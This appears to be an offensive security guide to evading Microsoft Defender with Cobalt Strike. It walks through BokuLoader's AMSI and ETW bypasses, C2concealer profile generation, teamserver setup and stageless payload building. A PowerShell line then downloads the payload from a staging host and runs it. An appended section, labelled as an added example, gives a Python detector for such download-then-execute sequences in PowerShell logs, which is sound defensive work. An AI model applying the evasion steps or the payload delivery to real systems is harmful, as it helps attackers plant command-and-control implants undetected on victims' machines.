Evading Defender with CobaltStrike

Quick guide to evading Defender (as of 26 May 202)

The following guide is based on BokuLoader and C2concealer. BokuLoader uses Halo's Gate to perform direct syscalls, patches AmsiOpenSession to disable AMSI, and disables Windows event tracing (ETW). For a more in-depth guide on how reflective DLLs work or how AMSI is disabled within this process, I recommend Sektor7's Malware Development and Windows Evasion courses or OffSec's PEN-300 course.

To start, clone both GitHub projects mentioned above:

git clone https://github.com/boku7/BokuLoader
git clone https://github.com/FortyNorthSecurity/C2concealer

You'll want to run C2concealer's install script and update the main.py script with the location of your Cobalt Strike folder. With that information updated and C2concealer installed, it's time to generate your own profile. Keep in mind you should follow FortyNorthSecurity's guide for customizing the tool to your op.

C2concealer --hostname test.com --variant 1

If the profile fails to generate, run the script a couple more times.

Next, start up your teamserver:

./teamserver <IP> <password> <Path To C2concealer Generated Profile>

Now it's time to update the artifact kit to set the stagesize to 412256. Update this value in both build.sh and dist-template/artifact.cna.

Then load the dist-template/artifact.cna and BokuLoader.cna aggressor scripts in Cobalt Strike.

Next, generate your x64 stageless payload (Attacks -> Packages -> Windows Executable (S)). A successful payload generation should look something like this in your script console:

Now it's time to deliver the payload to the target. In this example we use Cobalt Strike's hosted file feature (Attacks -> Web Drive-by -> Host File) to drop the payload on disk and run the exe.

If you're just testing this, make sure to disable Tamper Protection, Automatic Sample Submission, and Cloud Delivered Protection.

Download and execute the payload in whatever manner you want; we chose to use PowerShell:

 iwr -uri http://10.10.100.100/download/file.exe -outfile file.exe
 .\file.exe
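From the defender's side, the two PowerShell lines above are exactly the kind of download-then-execute pair that PowerShell script block logging (Event ID 4104) records, and they can be correlated with a few lines of code. The following is an added example and not part of the original guide: it runs a simple "download cradle followed by execution of the downloaded file in the same process" rule over a small set of constructed script block log entries (the timestamps, process ids and script text are made up for the example, and the event tuple layout is an assumption about how you would flatten real 4104 events).

```python
import os
import re
from collections import defaultdict
from datetime import datetime

# Constructed sample of PowerShell script block log entries (Event ID 4104),
# flattened to (timestamp, process id, ScriptBlockText). Not real captures.
SAMPLE_EVENTS = [
    ("2021-05-26T10:01:02", 4120, "Get-ChildItem C:\\Users"),
    ("2021-05-26T10:02:15", 4120,
     "iwr -uri http://10.10.100.100/download/file.exe -outfile file.exe"),
    ("2021-05-26T10:02:20", 4120, ".\\file.exe"),
    ("2021-05-26T10:03:00", 5010,
     "Invoke-WebRequest -Uri https://example.invalid/tool.zip -OutFile C:\\tmp\\tool.zip"),
    ("2021-05-26T10:03:05", 5010, "Expand-Archive C:\\tmp\\tool.zip"),
]

# Download cradle: iwr / Invoke-WebRequest / curl / wget (the last two are
# PowerShell aliases for Invoke-WebRequest) writing to disk via -OutFile.
# PowerShell accepts unambiguous parameter prefixes, so -outf... is matched too.
DOWNLOAD_RE = re.compile(
    r"\b(?:iwr|invoke-webrequest|curl|wget)\b.*?-outf\w*\s+['\"]?(?P<path>[^\s'\"]+)",
    re.IGNORECASE,
)

# Command-position token of a statement, allowing the call operator (&) and
# Start-Process as invocation prefixes.
EXEC_PREFIX_RE = re.compile(
    r"^(?:&\s*|start-process\s+(?:-filepath\s+)?)?['\"]?(?P<cmd>[^\s'\"]+)",
    re.IGNORECASE,
)


def basename_lower(path):
    """Normalise a Windows or POSIX path to its lower-cased file name."""
    return os.path.basename(path.replace("\\", "/")).lower()


def command_targets(text):
    """Yield the file name in command position for each ';'-separated statement."""
    for stmt in text.split(";"):
        m = EXEC_PREFIX_RE.match(stmt.strip())
        if m:
            yield basename_lower(m.group("cmd"))


def detect_download_then_execute(events, window_seconds=300):
    """Return one alert per (process, file) where a file written to disk by a
    download cradle is invoked by the same process within window_seconds."""
    pending = defaultdict(list)  # pid -> [(download time, file name)]
    alerts = []
    for ts_str, pid, text in sorted(events, key=lambda e: e[0]):
        ts = datetime.fromisoformat(ts_str)
        m = DOWNLOAD_RE.search(text)
        if m:
            pending[pid].append((ts, basename_lower(m.group("path"))))
            continue
        targets = set(command_targets(text))
        for dl_ts, name in list(pending[pid]):
            if (ts - dl_ts).total_seconds() > window_seconds:
                pending[pid].remove((dl_ts, name))  # too old, drop it
            elif name in targets:
                alerts.append({"pid": pid, "file": name,
                               "downloaded": dl_ts.isoformat(),
                               "executed": ts.isoformat()})
                pending[pid].remove((dl_ts, name))
    return alerts


if __name__ == "__main__":
    for alert in detect_download_then_execute(SAMPLE_EVENTS):
        print(alert)
```

The rule only fires when the downloaded file name appears in command position (`.\file.exe`, `& ".\file.exe"`, `Start-Process file.exe`), so the second constructed process, which downloads an archive and then merely passes it to Expand-Archive as an argument, is not flagged. In production you would feed it the ScriptBlockText field of real 4104 events and tune the window to your environment.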
